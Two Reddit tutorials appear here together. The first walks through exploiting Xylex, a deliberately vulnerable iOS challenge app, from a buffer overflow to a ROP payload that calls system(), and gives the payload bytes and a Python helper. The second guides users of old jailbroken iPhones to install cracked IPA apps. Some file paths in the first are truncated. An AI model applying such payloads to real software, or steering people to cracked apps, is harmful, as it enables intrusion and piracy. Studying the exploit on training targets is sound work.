[Tutorial] Exploiting Xylex program on iOS 10.x (for Beginners)

Hi Jailbreak! GeoSn0w here!
Spoiler alert! Long tutorial, suitable for beginners!
A couple days ago I've decided to try to complete the Xylex challenge created by developer Billy Ellis. Some of you know Billy already, but for those who don't I'll have some links down below.
Basically, Xylex is an application that is made purposefully vulnerable by Billy as part of his Exploit-challenges project on GitHub. As I liked the idea of trying some ROP, I've decided to complete the challenge and while I am at it, maybe to also write a tutorial. Keep in mind, this is going to be a long tutorial, so reload your patience cartridges and let's do it. Also, do keep in mind that Billy made a very good video on it too, will have a link down below if you're a visual learner.
Enough Introduction, let's sploit
Okay, so we know that Xylex is an armv7 Mach-O binary, this means we can't play with it in macOS terminal, we have to side-load it to a Jailbroken device. I think any device would do. I have tried on aarch64 as well and it works.
You can download the armv7 compiled Xylex from Billy's Github. I've used iFunBox to load it into DCIM and from there I've moved it with Filza to a Development folder somewhere in /va
Okay so when we run the application for the first time, via SSH, of course, as we want to exploit it remotely from the PC, we can see an ASCII welcome screen.
As you can see from the screenshot, the application asks for authentication (username only), so I thought I should try feeding the app a couple "AAAAA" to see if we can trigger a crash and therefore a buffer overflow, but the application is apparently well made and it is not vulnerable on that part as can be seen from the next screenshot. The application responds with the fact that there is no user with that name and quits normally.
Okay, so we need another approach. Time to fire up Hopper (Or IDA... Or Radare...).
Okay, so we've loaded the Mach-O into Hopper Disassembler, and we've located the _main function. In this screenshot of Hopper you can see that we've located the ASCII welcome message and looking a bit further down we can easily spot the username being hardcoded into the app and that being guest as can be seen from here.
Let's test the username we've found hardcoded in the app. Yep, it does indeed work and sends us to a new screen.
Okay, but how can we exploit this application so that we can change its control flow in a way that it would facilitate us to do things that were not intended to be done? Well, since the username part seems to not be vulnerable, let's try further with something else. You can see that after we've managed to log in, the app gives 3 possible operations:
  • Display system version, which in fact displays Xylex version, not very useful for what we need as it does not accept any kind of user inputs.
  • Open file (now we're talking!)
  • Exit (clearly not useful for us)
Okay, so we have a feature that allows us to open files inside Xylex, well, let's try the same fuzzing method, only inside a file. In order to craft our file we can use the following command in terminal:
printf "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" > testdummy 
That would create a new file called testdummy in the current directory containing a bunch of "A". Let's see what effect it has on Xylex once we load it on.
Sweeeeet! As you can see the application has returned "Segmentation Failed: 11" which means it has crashed, so it is definitely vulnerable! We've got the vulnerability, now how can we exploit it? Well, let's first find the cause of the crash. To do that, we're going to analyze the crashlog.
The crashlogs can be found on the following path /vamobile/Library/Logs/CrashReporte and as you can see, with ls command we can see all the crash logs, including Xylex. We're going to select the most recent. The date is in the name of the log as can be seen here
Let's cat the last log. As you can see, we've managed to overwrite the PC (Program counter) register with 0x41414140 which is the hex for "AAAAA". So we basically got control over the program's flow, but where? The PC holds the address to which the program flow will be redirected next, so if we can possibly put our own address there, we can execute whatever we want, but what do we want to execute? Let's go ahead back to Hopper and see if we can find anything useful, but before we do that, we must see WHERE in that huge chunk of "A"s is the PC being overwritten? We need to know that either way, there's nothing much we can do with this vuln. To do that, let's change our testdummy file from "AAAAA" to a pattern like "AAAAABBBBBCCCCCDDDDD" so that we can detect in which group the PC gets overwritten. So the command would look like:
printf "AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHKKKKLLLLMMMM" > testdummy 
Alright, so we've managed to produce another "Segmentation Fault:11" with the new file, now let's analyze the crash log and see which pair caused the overwrite on PC.
As you can see from the crashlog, PC is now 0x46464646, which happens to be "F" in hex, so we know that the PC register got overwritten after E. There is where we are going to place our good stuff, but what is this good stuff? Time for Hopper.
As you can see, in Hopper we can easily see the system() function being referenced, and Billy was kind enough to leave an "uname -a" in the program at address 0xc040 ;) So theoretically we can pwn the program so that once our shellcode is loaded via the file opening function, we redirect the program to a specific address and possibly execute uname -a which will give us details about the iDevice (the Kernel version and so on). This was never intended to be possible, so how the hell can we do that?
Billy has left an Easter egg for us in the program, apparently. See, there is a _gadget method at 0xbb74 that literally contains
 pop {r0, pc} 
A better ROP gadget wouldn't be possible for this program. If we can overwrite the PC (program counter) and the r0 (general purpose register) to contain the good stuff we need, we will be able to run our command and hijack the program!
Okay, so we have all we need, now we need to craft our shellcode.
We're going to use the chars from A to E as and then we're going to place the good stuff. Let's collect addresses ;)
We know that "uname -a" is located at address 0xc040 and if you look closely, at 0xbb98, we have a branch with link (bl) instruction that looks like this:
0000bb98 bl imp___symbolstub1__system 
Here we go with our system() call!
Okay, so we have the gadget and the good stuff, we know where PC register gets overwritten, let's craft our shellcode:
So we have the following important addresses collected:
  • 0xbb74 - The _gadget we're going to use!
  • 0xbb98 - The system() call!
  • 0xc040 - The "uname -a" command!
At first we will copy the A -> E from the dummy file:
AAAABBBBCCCCDDDDEEEE 
And now we add the addresses we've collected. Now, because the byte sex is Little Endian, we have to put it backwards! like this:
AAAABBBBCCCCDDDDEEEE\x74\xbb\x00\x00\x40\xc0\x00\x00\x98\xbb\x00\x00 
So we have the addresses written in Little Endian, and we have the gadget, the uname command and finally the system() call.
Let's write this into a new exploit file!
Okay, now let's feed the exploit file to the program and see what happens! AND HERE IS THE RESULT! As you can see, we've pwned the program! It did run "uname -a", printed out the output of the command which is represented by details about the kernel, and then Seg. Faulted and quit :)
That's it! We've pwned the program, controlled the flow of it, ran an arbitrary command and got to where we wanted!
Thanks a lot for reading, I really hope you've enjoyed this tutorial, took a while to put together, and I wanna thank Billy Ellis for the amazing Xylex program he has created. Billy has also made a video with the exploitation (exactly what we did) of Xylex.
Other Resources
I hope this tutorial helps! Note that I am a beginner on iOS Exploitation myself, so I am teaching you as I learn. I hope I made things clear.
~GeoSn0w
submitted by GeoSn0w to jailbreak
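
The two analysis steps from the Xylex tutorial above, as an added Python example (not part of GeoSn0w's post or Billy Ellis's project): it finds which 4-byte group of the test pattern reached PC, then decodes the three little-endian words of the final file. All values come from the post; the function names are hypothetical, and the bit-0 masking reflects that ARM clears bit 0 of PC when the loaded address selects Thumb state, which is why an all-"A" buffer is reported as 0x41414140.

```python
import struct

# Values quoted in the post above.
PATTERN = b"AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHKKKKLLLLMMMM"
PAYLOAD = b"AAAABBBBCCCCDDDDEEEE" + b"\x74\xbb\x00\x00\x40\xc0\x00\x00\x98\xbb\x00\x00"
KNOWN = {
    0xBB74: "_gadget (pop {r0, pc})",
    0xBB98: "bl system",
    0xC040: 'string "uname -a"',
}

def pc_candidates(buf, crash_pc):
    """Offsets of every 4-byte group in buf that could have produced crash_pc.

    Bit 0 is ignored on both sides: a value with bit 0 set switches the core
    to Thumb state and PC is reported with that bit cleared.
    """
    hits = []
    for off in range(0, len(buf) - 3, 4):
        (word,) = struct.unpack_from("<I", buf, off)  # little-endian 32-bit
        if word & ~1 == crash_pc & ~1:
            hits.append(off)
    return hits

def annotate(payload, offset):
    """Decode the three words that follow the padding and label their role."""
    words = struct.unpack_from("<3I", payload, offset)
    roles = (
        "overwrites saved return address, loaded into pc",
        "popped into r0 by the gadget",
        "popped into pc by the gadget",
    )
    return [(w, f"{role}: {KNOWN.get(w, 'unknown')}") for w, role in zip(words, roles)]

if __name__ == "__main__":
    # An all-"A" file proves a crash but not a position: every group matches.
    print("all-A candidates:", pc_candidates(b"A" * 44, 0x41414140))
    # The grouped pattern narrows it to one offset.
    (offset,) = pc_candidates(PATTERN, 0x46464646)
    print("pattern offset:", offset)
    for word, note in annotate(PAYLOAD, offset):
        print(f"0x{word:08x}  {note}")
```
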

[Tutorial] Essential Guide for Freshly Jailbroken iPhoneOS 3.x.x Devices

Prelude

So you've just jailbroken with Redsn0w. What do you do now?
I'm gonna explain how to fix your non-functioning Cydia, install Debian packages, install IPA files (APKs for iOS) to your device, and finally, fix certificate issues with Safari.
Since this is going to be quite an extensive guide, I will split this guide into 4 sections. Note that all folder names introduced in this tutorial are case sensitive.
Download iFunBox Classic if you're on Windows, download iFunBox if you're on Mac (iFunBox download)

Fix Cydia

  1. After you freshly jailbroke, open Cydia for the first time and select User, let Cydia do its thing and open it again after it's done. If it opens and reloads data by itself, skip step 2, but if it gets stuck on loading data for more than 10 minutes, follow step 2.
  2. If your Cydia now gets stuck on reloading data for more than 10 minutes, connect your device to your Windows computer or Mac computer with the software iFunBox installed and close Cydia. Then, go to Device>private>var>lib>apt>lists and delete everything except for the Partial folder. Open Cydia again and select User.
  3. Go to sources and add the InvoxiPlayGames repo [click edit, then click add source, and type exactly cydia.invoxiplaygames.uk, and click add source again], and let it install the repo.
  4. Go to the Search tab and search for CydiaHTTPatch. Click the first result and click install, and once prompted, restart Springboard. Your Cydia should be fixed. If it still has this error, you will need to manually install Debian Packages

Install Debian Packages

Note that this method is only for when your Cydia doesn't get fixed by the previous method.
Use iFunBox to do this
  1. Search and download your tweak from www.cydiacrawler.com. It should be in the form of a .deb file.
  2. Navigate to Device→var→root→Media, and create a folder named Cydia. If it's already there, open it.
  3. Inside the folder Cydia, create a folder named AutoInstall. Again, if it's already there, open it.
  4. Place your .deb tweak inside the AutoInstall folder and reboot, not respring.
  5. Every time you want to install a tweak now, just put the .deb file into the AutoInstall folder, and reboot.

Install IPA Files

Many of you know that the App Store is extremely slow and most apps that are compatible are now removed from the app store. To get apps to work, you need to install something called an IPA file, which is APKs for iOS devices. To get the IPA files, I highly recommend the Momentum Store, which hosts a large collection of IPA files. To download the files, you will have to sign up for an account. (You will see me active on there a lot, posting my stash of iPhoneOS 3.1.3 IPAs)
  1. Get the tweak Appsync (for those of you who have working Cydia, add the repo mtmdev.org/repo, and search Appsync for iOS 3 on Cydia, click the top result and install it; for those who don't, install this .deb manually.)
  2. Now, for those with working Cydia, after it resprings your device, connect your device to your computer with iFunBox open; if you don't have a working Cydia, you should already be connected to your computer.
  3. Select Install App at the top, and drag your .ipa file in.
  4. Wait for the installation progress bar to finish, this may take 30 seconds - 3 minutes depending on your USB transfer speed and the size of the app. If the installation fails, the app is not compatible with your iPhoneOS version. If the app crashes at launch, the cracker has not cracked the app properly, it's not your fault :)

Fix Safari Issues

  1. From my Google Drive, retrieve the IPA for Opera Mini.
  2. Install the IPA file, as I explained in the previous section.
  3. Open up Opera Mini, and you're good to go!
With Opera Mini, you can visit almost any modern website without getting errors, such as Reddit (but you have to use i.reddit.com or old.reddit.com). You can even log in, comment, and post! Additionally, Gmail works as well, you can sign into Google, all that good stuff. However, the search bar from www.google.com does not work; use the search bar at the top right.
As of now, you can only watch very old YouTube videos on Opera Mini. If you get an error message saying "opera mini is soon becoming opera touch" or "opera mini is not supported", just click the X at the top right and it should go away. AFAIK even after it's not supported it will continue to work.

Footnote

I hope this guide helped you improve your experience with your iPhones and iPod Touches running iPhoneOS 3.1.3. As of now, there isn't a way to fix the weather app, as the API is too old, however, everything else works :)
Some Tweaks I Recommend You Get:
  1. Appsync Unified
  2. MobileTerminal (Obsolete)*
  3. Flashlight by BigBoss
  4. SBSettings
  5. Cycorder (for iPhone only)
  6. A2DP Enabler
  7. SetWallpaper
*Only the (Obsolete) version works on iPhoneOS 3.1.3.
For further information and downloads, click here. Note that you do need an account to download; sign up and contact u/Anbar48. Do not attempt to install the tweak IPAInstaller, it is meant for iOS 5+.
If you want another section added or further explanation of a section, feel free to leave it in the comments. I'm pretty sure this guide applies for iPhoneOS 2 and iOS 4 as well, but don't try to install the IPA for Opera Mini on iPhoneOS 2 because that's for iPhoneOS 3.1.x and above.
submitted by SynergyUX to LegacyJailbreak